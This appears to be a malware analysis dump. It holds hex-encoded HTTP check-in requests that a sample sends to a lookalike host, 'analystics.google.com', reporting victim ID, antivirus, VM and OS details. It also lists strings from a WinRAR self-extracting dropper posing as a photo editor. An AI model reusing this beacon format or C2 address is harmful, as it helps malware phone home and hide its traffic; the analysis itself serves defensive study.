0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79672f77 35444a6b 6c2b7666 6232334b   yg/w5DJkl+vfb23K
0x000000b0 (00176)   412b472f 36764234 372b7158 7a4f3435   A+G/6vB47+qXzO45
0x000000c0 (00192)   47633975 7a324b71 742b6b73 66204854   Gc9uz2Kqt+ksf HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 31343526   XX0000&key=1145&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d393626 6f733d35 2e312e32 3630302e   =96&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79672f77 35444a6b 6c2b7666 6232334b   yg/w5DJkl+vfb23K
0x000000b0 (00176)   412b472f 36764234 372b7158 7a4f3435   A+G/6vB47+qXzO45
0x000000c0 (00192)   4763312f 69645077 4f446e71 63204854   Gc1/idPwODnqc HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

Strings

strcatVirtualProtect
.
..
..
..\a...
w.
W78..
I
..
\
.CC
 

 1993-%d
Accept
|;bI&
Bro&wse...
by Alexander Roshal
bytes
Cancel
&Cancel
Cannot create folder %s
Cannot create %s
Cannot open %s
Close
Confirm file replace
Copyright 
CRC failed in %s
DCRC failed in the encrypted file %s. Corrupt file or wrong password.
Decline
&Destination folder
eRichEdit
ErroraErrors encountered while performing the operation
Extract
Extracting files to %s folder$Extracting files to temporary folder
Extracting from %s
Extracting %s
Extraction progress
|f.,
File close error
folder is not accessiblelSome files could not be created.
                                 H
         (((((                  H
         h((((                  H
~hRichEdit20W
Install
	jmsctls_progress32
KERNEL32.DLL
License
LICENSEDLG	RENAMEDLG
Look at the information window for more details
modified on
mscoree.dll
MS Shell Dlg 2
Next volume
Not enough memory
No to A&ll
Packed data CRC failed in %s
Please close all applications, reboot Windows and restart this installation\Some installation files are corrupt.
Please download a fresh copy and retry the installation
Read error
Rename
&Rename
Rename file
REPLACEFILEDLG
Select destination folder
Skipping %s
STARTDLG
The archive comment is corrupt
The archive header is corrupt
The file "%s" header is corrupt%The archive comment header is corrupt
The following file already exists
The required volume is absent2The archive is either in unknown format or damaged
	TITLE_BMP
TITLE_BMP
=Total path and file name length must not exceed %d characters
Unexpected end of archive
Unknown method in %s
WinRAR self-extracting archive
with this one?
Would you like to replace the existing file
Wrong password for %s&Write error. Probably the disk is full
&Yes
Yes to &All
^@@@@@
                          
+----(
+@-@+*
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
))020302130312131303131I13613373373373I67I37I6ILI7I7LIHLLIHLLLQLRLQRLRRRRQLLLIL5LLLLLLLLLRRLR>RLVRTRTRTTVTWWWWWWWWWaWWTWW`TWW`TW``WhTT`TW```T``Wh`h`hbhhc`h`h`h`hchhchhjhjhjhhjhkhkhkkhkkkhkkhkkhkkhkkikkhkhkkhkhkhhkhhjhjhhjhhhhch`hjhhhb`hhhahhahTW`ahWhbWha0
0A@@Ju
0_bOq(V.cnc>1
@|0l#_
0 \@lN}Z3Q0
0MMQMSMM6"
0MXSYVM2(
0^plp_pp^L
<0Q,j/
0SSSSS
0Y^]^SM1(
1	\\)(
.1.117O[ry~tmR.
1C!3Q#A
 1!cKT
+|<1NH
1SZZSN1
1U[\U7,
-1%}Z.
1Z[]d[ZU7
1Zx2_o
2Aku+au
2Am!}1
@@+2C@BAC-CBDDA2A-A-@)
^-----+-2-D--D-BD6BDFHDD6DEA-(
;~2dvQ
2EKMGGMG2)
2los#T`s~
2sZUSUZSNH.
2tSSUSSNH,
2yZYUYSZUNH1"
3~[\a\fZZd[aZZZZUO7L767717777HOU[dfWZO7777777O7OUagngeaaOOOO>OOOOTU`antvzuvu
3MJ6D2B--,
3MJJKMJ62
,.3M[]]][Z]d]]d[\][[]d]deeeeeWO5/1LWgtttvvv
3~"n-Q
3[^^^^p^X3
3q#au=uA
3|QNaHq(
3XSXQG1
*3Yc {
""("")",".".".#........4.040.4015414154555555<57>5>7>7>7>L>7>L>L>R>L>R>LTR>LTR>R>R>R>R>R>R>R>R>LT>L>L>>L>L>L>L>5>7>7>5<57<555555514541414040.55LLW
;=4'&4w
46SSSRM6(
(48saB{S
$ '4999
%4hkjkk
%%%'4>iowkW5
4(MPPKMJ62(
;4NI1,,
?4Odntv
59>bArzNooq
+5F[uSDC
5Nmp=Y
5wwwWR5405TWiw
,-6-6D6-D6-6EHMMYZZ]d]]eeeempnmrprrrmrsrtttzvttvumnegef[degervvu
6'c=$8X
	*6DD6EIHKMQH1
6GKMXJF*
6hFx4"
6hFxFXvHV
6hFxVH
6hFxVHfXv
6hFxVIgYw
6hFxVXvHv
6JGMPMJSMSPF0
6SMQM0
6SSSJ1("=
6SSSQH1
6SSSSUQRNLU[d]Z\ZSZ\erry
6SY[SZR1
6S[ZYVQH1/
	6XZSQN6
6^[^ZZ]UH"
71}E8h
796IFYVDV
	7d[da]dWN/
7rrlU1
8$0feemgmggpmrrrrmnrrrtogeaaUWfnwzv
8##.5>aw
'8''99=?
'8%'999?
'8~C)GT;
8xnL+U
	|9!)1\cIy;Y
9"7U[U7.
 '99;;9:;;4R>>
9$#dttyrma7
9]P"&=
9"Ulpme[7"
;9''$!!&#W
9wIK4}
A|0l _
A}0l _
((,-,A-26-E6HHNNSU[]didiememmrmrmrmmgmeigmemmrrrsvtv{u
A[2b1C`
@@@A--@+@-A@-@+
^@AAA@2@A+-@--++@-@+-AADDC-(
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
^ACAC-D++-+++++++--BAGGEDA-*
+AD--(
^+---A-DADDDADDAGDBDCDGB6DD-)
#agdaU"
AGGGKGGGGGGF(
ahYxA@
An application has made an attempt to load the C runtime library incorrectly.
AP}(vxT
-A=Q2a"qR
-a=q-a=qM
-a=Q-a=qM
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
August
'avtvzvzvttn[`1
aWaWAwA
AwAWAwA
AwQ l=q
AxQ-a=
a >z'Ga(@b
(-BD6MMMYZ]Zede]dpedeeerrprrgmdgsrtrzv{~
(+BDD-+
*++----BDEIJMMMSQN3,
)---+++B-E6-,
BeginPaint
b$i?-$Os>
.\Blt|
b?r1-a
>bTRj5x
@~bURk
BxrsjqCm
)c8P|j
(c8zmStN
cc?<4#!
+CDGCEGGCGA(
ChZ4POV
<cjjc`4## 
CN3q#a
CorExitProcess
)CPCKGCPCG-
CreateWindowExA
- CRT not initialized
CtLm(Ql
}CUAq#
^D+@++
^D2D2EGHKMGMMKGJMGPKMGMGQMMME-
**D6MHQMSOH6H6NMMMNMSSS\\deee]eeemee[ZZZSZSSZZd]gptttzrvvt{zz
@.data
DBCDA+
(d^BoH}1
DC9IeyV
DcISdG
^-D-D--+A+A-DAADABDA2AAD2GDD
dddd, MMMM dd, yyyy
)DDHMHMEH-
December
DecodePointer
DefWindowProcA
DeleteCriticalSection
DFKEGGEEGEF-
-DGGED2A)
DGGGEGDD)
DGMGHMGMKM36(
DGPKPPKJD
DispatchMessageA
DJJPKPGKMPJA(
DJMKJMJM6(
_D*^k5
DOMAIN error
D]P1M!U
dq2*87
[dR(O1
dsyty~yrQ"
=D]T}d]t=
DtNIf|
dvtfDV
eGUOE7u
eMk$<|e
EncodePointer
EnterCriticalSection
EQ-a=qM
essxyyseQ"
\e!x9Q
ExitProcess
	]e/"Z~
&E]ZH.`
e'z;	L
][f[da[edWd[ef[aeeaefaeeggeggegigggnggennogrnrnnorrnurutu
February
F[%:HXv
-f?JUu%(
-FKFEGHJPKMM-
- floating point support not loaded
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
:*fmr 
F:{pbQ
FreeEnvironmentStringsA
FreeEnvironmentStringsW
Friday
f+T|]P2
Fu8g+W
;$fvk`T>bik
fwbqq>
FxVH$Xv
{/G2fJ
G@CCCCCGB+
GCKCKKPGC0
(GCKGKGKDGD-(
GDI32.dll
GetACP
GetActiveWindow
GetCommandLineA
GetCPInfo
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetEnvironmentStrings
GetEnvironmentStringsW
GetFileType
GetLastActivePopup
GetLastError
GetLocaleInfoA
GetMessageA
GetModuleFileNameA
GetModuleHandleA
GetModuleHandleW
GetOEMCP
GetProcAddress
GetProcessHeap
GetProcessWindowStation
GetStartupInfoA
GetStdHandle
GetStringTypeA
GetStringTypeW
GetSystemTimeAsFileTime
GetTickCount
GetUserObjectInformationA
GetVersionExA
Gffff`
?ggcib`5#
.GJ-s2
	)GKCPKGD(
Glxxsxsxspxspsxysyxytyzyyyyytytyyysyyyyyrsrpppp]]^\Y^Z^]^d]pppprprxrssyy{~{~
g= Nu6AFFK
(GPKPPJA(
GXPXPK3(
;	h`5#8
hAM"}cR
HeapAlloc
HeapCreate
HeapFree
HeapReAlloc
HeapSize
_HGDGDKEFEEGJJGMGMKGMGEKGMKH2)
-HGGM6
HH:mm:ss
HLY,y<y
HMSPMSM6(
Hq(E1Y
h$s2HcX
HSRM60
h]::TAF
hU,[<Z
HXMSXR1
HYSSNH)
HZ.SH`
HZ^ZQ1
%I1!ls
?:I7JF
iaeaefeaffedageigiegegigeigggingenggrrnnmnrnnounroouvuuuuuuzuv
>idxyQ
iGoWVbH
i*gQLuH\
IMQSSYUSSUM6
InitializeCriticalSectionAndSpinCount
InterlockedDecrement
InterlockedIncrement
I^^^]p^^[6
IsDebuggerPresent
IsValidCodePage
|Iu*93
i),x\h
ixysyyymU
i\y,	<
] i+y;	K
IYYQ2,""06LNIOX[]pepmreeZN.
izyzyv~mO"
j1SSQMN1
j>/& 8
JanFebMarAprMayJunJulAugSepOctNovDec
January
jchOOUSMMM-
=jEiw:
jG)iqf
j.IH7,
?jjjh=<#
j@j ^V
Jl^pp^ppZ7
JRGc!x
JSXJD0
Jv=a-Q
k=--<.
k`/! 8
k?<9<;
kb>><>><>```k
K%c	fU
kernel32.dll
KERNEL32.dll
%kfWh=
kh><<=`hk
?,KJMSJMJH*
knG>mN}^
k'o&x =
KPKPXK3)
KQMD32)(
Kw;f*V
>kXOmm
)KXXXXPM(
l2-D-(
{L5D0y
L`\9l)|4
L	()B)
}+ lBt2~"	nA
LCMapStringA
LCMapStringW
lD6-6-----*B--6B6DHHMEMHHD6--*
>lE5VH8
LeaveCriticalSection
Lexepe]U0:
lG2D2(
Lh\|l[|V
LI\Yli|9
Ll.|	]
Lm\xlG|W
LoadAcceleratorsA
LoadLibraryA
	LpxlU.
L%\Tl)|9
L}\tl_|K
l)zxOvQ
"m}}}}
M!]0-@=S
M#]2-B=R
M&]5-E=U
m6$FnW<
M+]7-G{
MessageBoxA
Microsoft Visual C++ Runtime Library
Mlpppqpm[3
MM/dd/yy
Monday
MPSSMQH.
Mq<c.m
-MQSG6
)MQSNS1
#MSML61(
MUI2/Q
MultiByteToWideChar
MXXSKI-
MY[XZSM1"
{n\>'		]
N4z;c*
 n8t$D
na*_n#U
N[]d[]]\\aZRNUZ]dZL1"
NEK7k}
NeZa]d[U7"
njb,V<
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
November
(:^NPG
@nP~`YgI
NQSSSNSSMSMMMMHEMSMSSZYd[dd[degpeemgeedZYUSOMMSMSZZZ[dZZYUSMQMUSS]grv
nrJymBtth%
n+>RNS^
ns~;NW^
ntdll.dll
N[ZZR7"
NZZSU6,
o6}CsV
October
"Odggrrnrgorrrotttutvuz
?&#Odgtuutuututzvuz
Odmgenmernmrnrrrorttrtvurvuvvzv
OedaeUO1,
Ofed]aUO4"
"Ofgiorrurrnvutu
of*,tS
oicJci
O#Q"c0r
}O'>-ttO
owh# =
Owwwwp
P|Cju[eH
pe6C!'m
&pfPfp&
pGGDGIMGMMKMJMJMKQMSJMKMSPSKMJ-
Please contact the application's support team for more information.
p(pHp(p
PPPPPPPP
)PPXSXQ2(
Professional Photo Editor (PPE)
Program: 
<program name unknown>
)pthJ8
- pure virtual function call
PW)r<0
)PXPXPPC)
pxsxsxs]L
|pYl-p
)PYXXXS3
(q}1rH
Q4a%qZ
)Q9)CS^
Q-a=qL
Q-a=qM
Q'a=qM
Q-aX"!`1
qED2D(
qJ2H2(
:@_QKe 
qMDHD)
@qMHIH)
&)]qppxqx]I
QSH616INZZ[Z[Zd]YeZ]epre[O.
QSXSQN0
,QSY[X]]Z7.
QueryPerformanceCounter
qz0}h}
rcbCRc
R}Cms]cM
`.rdata
rDbT lB
Rectangle
RegisterClassExA
RIVX(G)ov
>rozvvzw
,[rpr[U7/"
]$rS-2=
RtlUnwind
runtime error 
Runtime Error!
rYbaR)|9
r{yV_0
RZ1" =
;S1\!6t
>s1ccF
s1c#TdS"
Saturday
SCRr-j
s"c\`|t
 SECdAqL
S]e[H,#
Sepp[L"
September
SetHandleCount
SetLastError
SetUnhandledExceptionFilter
S{=&\F
sHMHMRSMMMQMJMKMJKJJMMQQSSSSMSJM6H66D6---(
ShowWindow
SIBYriby
SING error
sJNMNH(
.Sl}M3
]sMc~P`O
SR&2vP
sSMMM1
+sSQMQH0
"SSYYSYYZSYUML6I7HLH7HNSZ^Z][d]epemprmporrrsrsrsttteWVaenstrrmrgrpnrtt
SSZSS6,
strstr
Sunday
SunMonTueWedThuFriSat
SunSystemClass
(SXSPXQ6
s{ymO.
"SYXSXS6
S[]\]\[ZR6=
~ta7<a
tehu)B
TerminateProcess
This application has requested the Runtime to terminate it in an unusual way.
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
Thursday
< tK<	tG
TLOSS error
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
{T.MGtT
tp8Oi0
TranslateAcceleratorA
TranslateMessage
t"SS9]
[tttvvtmWO"
{tt{vv
~{ttytt{~ym3
t$<"u	3
Tuesday
;t$,v-
tvrtrtvu
t+WWVPV
]u	!}B
uBhn&B
u~d!wYD
U]eeedpeeneepeermpgeeaR7
#Uef[U7/,
U{EhvfXD
U{EhvXfI
U	Ex7k'U
@UFspb=/
UFxgzTkE
~$}uHeoc
uLeZUhQaF
Umrsyztsnorvzv~vzvzv{~
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
UnhandledExceptionFilter
{uogaO
UpdateWindow
UprpmpZO1,/5R[daZWemt{
UQPXY]Y[
URPQQh WB
USER32.dll
USER32.DLL
usHF<s
UsQS%33
{utreddeegszvzw
Uu0N	`%'b
UxFV|Rm@
UyaIy4
U]Y[]YS1"
UZ\ZZ\ZZUOL.9
vcO#8% 
#.V>Gf0
VirtualAlloc
VirtualFree
v	N+D$
@|Vniu	x%N
VsfO}6hFxVHfXv
VSYZQM.
vXuo]:
w\3;ns 
W|AYOx.
w]cUSBCrVrL
Wednesday
>>W)f*v
w%,g&<P|
W%g+|X%u
.wi}~c
WideCharToMultiByte
WiT54"
|Wi-yid%r+
w/Mrd%
WriteFile
wSSSSMH.
wuknkoo
wvnkgcaT74//"
w`Xj%rT
'	WyGVHVhG
<#WZU7'
X@@@@@
x0`@_	
 X]9VW
Xc[yI"yZ
XDi\81
&Xe@n_
=$XHKR@
xL0#QdW
XoH2pUtZ
.xVHfXF
~~~y~~
y0fhk-
"y8w=Xk
Y9.J%$
y+eipy
yGMQMMMGHEED-+*******-D-B6DGH6D.*,02HMMMMHFHDF6*(
!yGrE-g
y(hlX|!
-y-I%>
Y,i<y(
Y,i;y3
y+JiG!z
Yl(4$-
}}y{lF
y.o#BayS
}|}{|y|qyxyxl+
y~SZ;3=Tb
>=Yt1j
}}||y|y|~}}
{~yye3
Y%Yl)w(
}{~yyyssp3
}{}|{yyyysl2
~{~~yzyl3
>]z;}+
 $]{~z~
*$.}z+
Z0r4et
z2p</M
z6$^ n
Z[d]ddZU1
'.Z]eeeedeeeeegmemdedZO1
z@jP$@
z$Kl)|9
Zpeme[W1
ZrAoq\bJ
#ZrmeZTH."
z{ttmr]Z[ZSZSZ[eemrgiaW<<144<>`c
zTyB~msc
Zwf0+D
~{~zyyz{z}
ZZWZWdd[ZeZfaZdadaZfWdZf[adaeageefidififfiggeginrgnumnnnonuounvuut
#ZZ[ZH/
ZZZZWZZZZZZUN1.